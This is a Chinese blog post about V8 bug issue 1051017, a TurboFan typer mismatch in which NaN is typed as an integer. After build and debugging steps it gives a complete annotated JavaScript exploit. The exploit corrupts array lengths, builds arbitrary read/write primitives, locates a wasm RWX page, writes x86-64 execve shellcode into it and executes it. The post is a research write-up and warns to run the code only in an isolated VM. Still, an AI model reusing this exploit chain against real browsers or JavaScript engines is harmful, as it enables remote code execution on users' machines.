issue-1051017

issue-1051017

作者: cnitlrt | 来源:发表于2022-01-19 00:07 被阅读0次
    # Pin the V8 checkout to the exact revision this writeup targets; the
    # hard-coded heap offsets in the exploit below presumably only hold there.
    git reset --hard fc3ba8577e14342cc8edda808c517b6b9a088081
    # Fetch the dependencies matching that revision (needs depot_tools on PATH).
    gclient sync
    # Generate the build directory out.gn/x64.release with default release args.
    tools/dev/v8gen.py x64.release
    

    编辑 out.gn/x64.release/args.gn

    # Debug aids added to the release build (goes in out.gn/x64.release/args.gn).
    v8_enable_backtrace = true      # native backtraces on crashes
    v8_enable_disassembler = true   # required for --print-opt-code style output
    v8_enable_object_print = true   # object dumping (e.g. %DebugPrint) in d8
    v8_enable_verify_heap = true    # heap verification, helpful while tuning the OOB writes
    
    # Build only the d8 shell; the exploit below is written against d8 (uses print()).
    ninja -C out.gn/x64.release d8
    
    调试技巧

    运行加该参数可以调试js代码

    --print-opt-code
    

    运行加

    --trace-turbo
    

    会生成json文件,然后用Turbolizer打开

    # Build Turbolizer (the viewer for the JSON emitted by --trace-turbo) and serve it.
    cd tools/turbolizer
    npm i
    npm run-script build
    # Python 2 module; on Python 3 use `python3 -m http.server`. Both listen on
    # all interfaces by default, so on a shared network prefer
    # `python3 -m http.server --bind 127.0.0.1`.
    python -m SimpleHTTPServer
    
    原理

    与 CVE-2019-5782 类似，本漏洞源于 TurboFan 编译器推断的类型与 JS 层实际运行结果不一致：运行 PoC 后，循环变量的实际值是 NaN，而 typer 却认为它属于 typer_->cache_->kInteger（不含 NaN 的整数范围）。后续建立在这一错误类型之上的范围推断和边界检查随之失效，于是可以对数组进行越界读写。

    exp

    exp 部分有几点需要注意。修改 a2 的 length 时不能只改一个 length，obj（JSArray 对象）和底层数组（backing store）的两个 length 都要改，否则会报错。这里的做法是：先定义 a1，通过 a1 的越界写修改 a2 本身的 length，再通过 a2 的越界写修改其底层数组的 length，从而得到一个 length 很大的数组；在此基础上构造 addrof、read_dataview 和 write_dataview，获得任意地址读写。还需要注意，由于这是较高版本的 V8，后面通过 wasm 来弹计算器的步骤与早期方法略有不同。文中用到的索引和偏移只对上文固定的那个 commit 有效；PoC 最终会执行原生 shellcode，请只在隔离的虚拟机中运行。

    // Shared 16-byte scratch buffer with three overlapping typed-array views.
    // Every conversion helper below (f2i / i2f / i2f1 / f2half / half2f)
    // writes through one view and reads back through another, so these
    // stay global and are never resized.
    var buf =new ArrayBuffer(16);
    var float64 = new Float64Array(buf);      // 2 doubles
    var bigUint64 = new BigUint64Array(buf);  // 2 x u64
    var uint32 = new Uint32Array(buf);        // 4 x u32
    /**
     * Reinterpret the bits of a double as an unsigned 64-bit BigInt.
     * Goes through the shared `float64` / `bigUint64` views over `buf`.
     * @param {number} f - double to reinterpret
     * @returns {bigint} raw IEEE-754 bit pattern of `f`
     */
    function f2i(f) {
        float64[0] = f;
        const bits = bigUint64[0];
        return bits;
    }
    /**
     * Inverse of f2i: build the double whose bit pattern is `i`.
     * @param {bigint} i - 64-bit pattern (must fit in an unsigned u64)
     * @returns {number} double with exactly those bits
     */
    function i2f(i) {
        bigUint64[0] = i;
        const asDouble = float64[0];
        return asDouble;
    }
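    /**
     * Number-typed variant of i2f: build a double whose bit pattern is the
     * integer `addr`, given as a JS Number (so only exact for non-negative
     * integers below 2^53). The value is split into low/high 32-bit halves
     * and written through the shared `uint32` view.
     * @param {number} addr - 64-bit value held in a Number
     * @returns {number} double with the same bits as `addr`
     */
    function i2f1(addr) {
        // Math.trunc replaces parseInt(): the original went number -> string
        // -> number with no radix, which is an idiom trap even though it gives
        // the same result for the integral addresses used here.
        const lo = Math.trunc(addr % 0x100000000);
        const hi = Math.trunc((addr - lo) / 0x100000000);
        uint32.set([lo, hi]);
        return float64[0];
    }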
    /**
     * Format a Number or BigInt as a 0x-prefixed hex string (no padding,
     * negative values keep their sign after the prefix).
     * @param {number|bigint} a
     * @returns {string}
     */
    function hex(a) {
        const digits = a.toString(16);
        return `0x${digits}`;
    }
    
    /**
     * Split a double into its two 32-bit halves, plus the other two words
     * of the shared buffer (the result always has four entries).
     * @param {number} val
     * @returns {number[]} [low32, high32, buf[2], buf[3]] as plain numbers
     */
    function f2half(val) {
        float64[0] = val;
        return [...uint32];
    }
    
    /**
     * Inverse of f2half: write 32-bit words into the shared buffer and
     * read back the first double.
     * @param {ArrayLike<number>} val - [low32, high32, ...]
     * @returns {number}
     */
    function half2f(val) {
        uint32.set(val);
        const rebuilt = float64[0];
        return rebuilt;
    }
    
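    /**
     * Instantiate a tiny wasm module (import env.puts, export `memory` and
     * `hello`) and return the exported `hello` function. The exploit later
     * overwrites the code that backs this export and calls it.
     *
     * Fix: the original `puts` import called `utf8ToString`, which is not
     * defined anywhere in this file, so invoking the export before it was
     * patched threw a ReferenceError. The string is decoded inline instead.
     * @returns {Function} the module's exported `hello`
     */
    function wasm_func() {
        // Read a NUL-terminated string out of linear memory `mem` at `index`.
        // The module's only string is ASCII, so a byte-per-char decode is
        // enough (d8 has no TextDecoder to lean on).
        function readCString(mem, index) {
            let end = index;
            while (end < mem.length && mem[end] !== 0) end++;
            return String.fromCharCode(...mem.subarray(index, end));
        }
        let h; // Uint8Array over the instance's memory; set after instantiation
        var wasmImports = {
            env: {
                // env.puts(ptr) -> i32; print() is the d8 shell's output function.
                puts: function puts (index) {
                    print(readCString(h, index));
                    return 0;
                }
            }
        };
        var buffer = new Uint8Array([0,97,115,109,1,0,0,0,1,137,128,128,128,0,2,
            96,1,127,1,127,96,0,0,2,140,128,128,128,0,1,3,101,110,118,4,112,117,
            116,115,0,0,3,130,128,128,128,0,1,1,4,132,128,128,128,0,1,112,0,0,5,
            131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,
            109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,1,10,141,128,128,
            128,0,1,135,128,128,128,0,0,65,16,16,0,26,11,11,146,128,128,128,0,1,0,
            65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
        let m = new WebAssembly.Instance(new WebAssembly.Module(buffer),wasmImports);
        h = new Uint8Array(m.exports.memory.buffer);
        return m.exports.hello;
    }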
    
    // Instantiate the wasm module once; `func` is its exported `hello`. Near
    // the end of the script its code is overwritten with shellcode and
    // `func()` is called to run it.
    func = wasm_func();
    var wasmObjAddr;
    // Exploit-wide state, deliberately global: foo() re-assigns a1/a2 on every
    // call, a3/objView are used by the read/write primitives. floatArray,
    // tmp_low and tmp_high are declared but never used in this listing.
    var a1, a2,a3,a4,floatArray,obj,objArray,objBuf,objView,tmp_low,tmp_high;
    /**
     * Trigger for the typer bug (issue 1051017).
     *
     * a1 / a2 are holey double arrays (note the leading hole). The loop
     * below leaves `i` as NaN at runtime: i starts at 0, `i += -Infinity`
     * makes it -Infinity, the branch flips x to +Infinity, and
     * -Infinity + Infinity is NaN, which fails `i < 1` and exits the loop.
     * So at runtime value = ((NaN >> 0) + 2) = 2 on every call, hence
     * idx = (idx & 28) * 2 and idx1 = (idx1 & 7) * 2 — for the warm-up call
     * foo(16, 5) that is 32 and 10, past the end of a1 and of a2 (9 slots).
     *
     * NOTE(review): per the writeup, the typer instead treats `i` as an
     * integer range without NaN, so after Math.max / negate / Math.max it
     * believes value is in [0, 1] and the masked indices stay in bounds;
     * once TurboFan compiles foo it presumably drops the bounds checks on
     * the two element accesses. That is inferred from the prose, not
     * visible in this listing — confirm with --trace-turbo.
     *
     * @param {number} idx  - index into a1, masked with 28
     * @param {number} idx1 - index into a2, masked with 7
     * @returns {number[]} a2 (the caller keeps the last one as a3)
     */
    function foo(idx,idx1) {
    
        a1 =  [, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1];
        a2 =  [, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9];
        // Yields NaN at runtime (see above); the typer disagrees.
        let x = -Infinity;
        let i = 0;
        for (; i < 1; i += x) {
        if (i == -Infinity) x = +Infinity;
        }
    
        let value = Math.max(i, 1);
        value = -value;
    
        value = Math.max(value, -2);
    
        // NaN >> 0 === 0, so value is 2 after the next line at runtime.
        value >>= 0;
    
        value += 0x2;
    
        // The masks bound the indices as the typer sees them (value in [0,1]).
        idx &= 28;
    
        idx1 &= 7;
    
        idx = idx *value;
    
        idx1 = idx1 * value;
        
        // NOTE(review): the shift round-trips presumably keep the indices
        // typed as 32-bit integers / stop the range from widening; do not
        // "simplify" them without re-checking the optimized graph.
        idx<<=1;
        idx>>=1;
    
    
        idx1<<=1;
        idx1>>=1;
        let tmp = a1[idx];
        let tmp1 = a2[idx1];
        // Unoptimized runs keep the bounds check and read `undefined`;
        // optimized runs read the memory past the arrays as doubles.
        if(tmp == undefined && tmp1 == undefined){
            tmp = 1.1;
            tmp1 = 1.1;
        }
        else{
            // 1.73833895195875e-310 is the subnormal double with bit pattern
            // 0x0000200000000000. When the slot itself holds a value in the
            // subnormal range, the add is an exact bit-level add of 0x2000 to
            // the slot's high 32-bit word — presumably a Smi length field
            // (see the writeup above), bumped by 0x1000 each time.
            tmp += 1.73833895195875e-310;
            tmp1 += 1.73833895195875e-310;
        }
        a1[idx] = tmp;
        a2[idx1] = tmp1;
        return a2;
    
        //return tmp1;
    
    }
    //print(i2f1(0x200000000000));
    // Warm-up: call foo enough times that TurboFan optimizes it (the count is
    // empirical). Each call re-creates a1/a2 and, once the bounds checks are
    // gone, bumps the length fields described in foo().
    for(let i = 0;i<10000;i++) foo(16,5);
    // Keep the last a2 (now with an inflated length) as the OOB array.
    a3 = a2;
    // Victim objects allocated right after a3 so its OOB indices reach them:
    // a DataView whose backing store read_dataview/write_dataview retarget
    // through a3[13]/a3[14], a BigUint64Array with recognizable marker values
    // (a4 is not referenced again here; presumably a landmark when inspecting
    // memory), and an object array holding the wasm function for the addrof
    // read of a3[40]/a3[54] below.
    // NOTE(review): those indices depend on this V8 revision's heap layout and
    // allocation order — re-derive them with %DebugPrint if the build changes.
    objBuf = new ArrayBuffer(0x200);
    objView = new DataView(objBuf);
    a4 = new BigUint64Array(4);
    a4[0] = 0x1122334455667788n;
    a4[1] = 0xaabbaabbccddccddn;
    a4[2] = 0xdeadbeefdeadbeefn;
    a4[3] = 0xeeeeeeeeffffffffn;
    obj = {aaaa:"bbbb"};
    objArray = [obj];
    objArray[0] = func;
    /**
     * Arbitrary read: retarget `objView`'s backing store at `addr` by
     * overwriting two slots of the oversized array `a3`, then read 8 bytes
     * through the DataView. Which half of each slot is the pointer and
     * which the length is V8-revision specific.
     * @param {bigint} addr - address to read from
     * @returns {bigint} the 64-bit little-endian value at `addr`
     */
    function read_dataview(addr) {
        const lowWord = addr << 32n;
        const highWord = (addr >> 32n) + 0x200000000n;
        a3[13] = i2f(lowWord);
        a3[14] = i2f(highWord);
        const raw = objView.getFloat64(0, true);
        return f2i(raw);
    }
    /**
     * Arbitrary write: retarget `objView` at `addr` exactly as read_dataview
     * does, then copy `payload` byte by byte through the DataView.
     * @param {bigint} addr - destination address
     * @param {number[]} payload - bytes to write (dense array)
     */
    function write_dataview(addr, payload) {
        const lowWord = addr << 32n;
        const highWord = (addr >> 32n) + 0x200000000n;
        a3[13] = i2f(lowWord);
        a3[14] = i2f(highWord);
        payload.forEach((byte, offset) => {
            objView.setUint8(offset, byte, true);
        });
    }
    // addrof(func) without a dedicated primitive: the upper halves of two a3
    // slots that overlap objArray. addr_high is presumably the heap base
    // (pointer compression), addr_low the compressed pointer to the wasm
    // function object.
    var addr_high = f2i(a3[40]) >> 32n;
    addr_high = addr_high << 32n;
    print(hex(addr_high));
    // NOTE(review): `[a3[54]]` wraps the double in an array; float64[0] = [x]
    // coerces through a string, which round-trips for doubles, so this works
    // but `a3[54]` is what was meant.
    var addr_low = f2i([a3[54]]) >> 32n;
    wasmObjAddr = addr_high + addr_low;
    print(hex(wasmObjAddr));
    // Walk JSFunction -> SharedFunctionInfo -> WasmExportedFunctionData ->
    // WasmInstanceObject, reading one compressed field at a time and
    // re-adding the heap base. The field offsets (0x7, -0x1, 0x3, 0x67) are
    // tied to the pinned V8 revision.
    var sharedInfoAddr = read_dataview(wasmObjAddr+0x7n) - 1n >> 32n ;
    sharedInfoAddr = sharedInfoAddr + addr_high;
    console.log("share info addr: "+hex(sharedInfoAddr));
    var wasmExportedFunctionDataAddr = read_dataview(sharedInfoAddr-0x1n) >> 32n;
    wasmExportedFunctionDataAddr = wasmExportedFunctionDataAddr + addr_high;
    console.log("wasm_func_data_addr: "+ hex(wasmExportedFunctionDataAddr));
    var instanceAddr = read_dataview(wasmExportedFunctionDataAddr+0x3n) >> 32n ;
    instanceAddr = instanceAddr + addr_high;
    console.log("instanceAddr: "+ hex(instanceAddr));
    // Full (uncompressed) pointer read out of the instance: the name says it
    // is the writable+executable wasm code region that func() jumps into.
    var rwx_addr = read_dataview(instanceAddr + 0x67n);
    console.log("rwx_addr: "+ hex(rwx_addr));
    // x86-64 Linux shellcode: appears to be execve("/usr/bin/xcalc") with
    // DISPLAY=:0 (the "/xcalc" bytes are stored xor 0x01; 59 is SYS_execve).
    var shellcode = [72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 121, 98,
            96, 109, 98, 1, 1, 72, 49, 4, 36, 72, 184, 47, 117, 115, 114, 47, 98,
            105, 110, 80, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1,
            72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90,
            72, 1, 226, 82, 72, 137, 226, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72,
            184, 121, 98, 96, 109, 98, 1, 1, 1, 72, 49, 4, 36, 49, 246, 86, 106, 8,
            94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5];
    // Overwrite the wasm code and call it: this executes native code in the
    // d8 process. Run only inside an isolated VM.
    write_dataview(rwx_addr, shellcode);
    func();
    
